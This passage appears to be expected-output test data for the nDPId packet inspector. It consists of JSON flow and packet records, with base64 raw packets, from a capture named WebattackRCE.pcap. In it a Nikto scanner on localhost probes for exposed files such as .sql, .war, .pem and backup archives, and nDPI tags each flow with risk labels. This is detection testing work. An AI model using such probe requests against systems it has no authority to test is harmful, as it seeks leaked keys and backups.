Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 